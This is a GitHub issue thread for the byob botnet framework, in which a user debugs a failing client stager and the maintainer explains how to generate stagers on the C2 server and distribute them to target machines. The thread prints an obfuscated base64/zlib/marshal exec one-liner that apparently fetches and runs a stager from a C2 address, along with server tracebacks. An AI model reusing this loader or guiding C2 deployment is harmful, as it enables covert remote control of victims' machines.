### ISSUE TITLE
Issue connecting to server using client script

### ISSUE THREAD

**Issue by siddharths2710** [malwaredllc/byob#167]
My testing environment is in **Ubuntu 16.04 OS** for both the client and server side instances.

Please have a look at the below image. The left terminal is the server session and the right one is the client. Zoom in if required:

![byobbug-min](https://user-images.githubusercontent.com/13200018/69896434-798b0500-1365-11ea-92ef-840bc6bd3345.png)

Running `test.py` provided by the client script throws a **404** error. 

Line which led to error:

`exec(eval(marshal.loads(zlib.decompress(base64.b64decode(b'eJwrtWZgYCgtyskvSM3TUM8oKSmw0tc3tDTSMzSz0DPUMzQ2tbIwsDDW1y8uSUxPLSrWLzEL0iuoVNfUK0pNTNHQBAA9zxH9')))))`

Decoding the content, I find that the client is attempting to read http://192.168.1.135:8083//stagers/t6R.py which in reality does not exist.

```
# curl -i http://192.168.1.135:8083//stagers/t6R.py
HTTP/1.0 404 File not found
Server: SimpleHTTP/0.6 Python/3.5.2
Date: Sat, 30 Nov 2019 06:11:06 GMT
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 469

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
        "http://www.w3.org/TR/html4/strict.dtd">
<html>
    <head>
        <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
        <title>Error response</title>
    </head>
    <body>
        <h1>Error response</h1>
        <p>Error code: 404</p>
        <p>Message: File not found.</p>
        <p>Error code explanation: HTTPStatus.NOT_FOUND - Nothing matches the given URI.</p>
    </body>
</html>
```
Based on issue #154 , I've disabled ufw firewall on both the client and server instances. Please provide a suggestion on how to proceed.

**Comment by malwaredllc** [comment]
1. Just to clarify, you need to generate the client script on the same machine that the server is running on. The client generator `client.py` is what will generate the stager script (in this case, `t6R.py`) in the `/stagers` directory to be hosted by the C2 server (i.e. http://192.168.1.135:8083//stagers/t6R.py). After generating the client script on the same machine running the server, you can then distribute that client script to the target machines.
2. Also, try running `server.py` without specifying the `--host` argument, so that it defaults to `0.0.0.0`.

**Comment by siddharths2710** [comment]
@malwaredllc okay, based on your input I ran the client generator on the server machine, and afterwards ran the stager script on the client machine when server was live. It seems I'm running into a new issue. Please check below:

![byob_issue2-min(1)](https://user-images.githubusercontent.com/13200018/69927785-54220680-14df-11ea-961e-293f9f66e2cc.png)


Server side logs:
```
[root @ /byob/byob]>Exception in thread 1575255716.079915:
Traceback (most recent call last):
  File "server.py", line 896, in __init__
    self.info = self.client_info()
  File "server.py", line 924, in client_info
    info = json.loads(data)
  File "/usr/lib/python3.5/json/__init__.py", line 312, in loads
    s.__class__.__name__))
TypeError: the JSON object must be str, not 'bytes'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.5/threading.py", line 914, in _bootstrap_inner
    self.run()
  File "/usr/lib/python3.5/threading.py", line 862, in run
    self._target(*self._args, **self._kwargs)
  File "server.py", line 781, in serve_until_stopped
    session = Session(connection=connection, id=self._count)
  File "server.py", line 899, in __init__
    print(bytes(e))
TypeError: 'TypeError' object is not iterable
```

Client side debug log (Adding a separate log file since it's a large trace):

[byob_client_debug.log](https://github.com/malwaredllc/byob/files/3909272/byob_client_debug.log)

**Comment by malwaredllc** [comment]
Use Python 2.7, the project is not fully compatible with Python 3 yet.
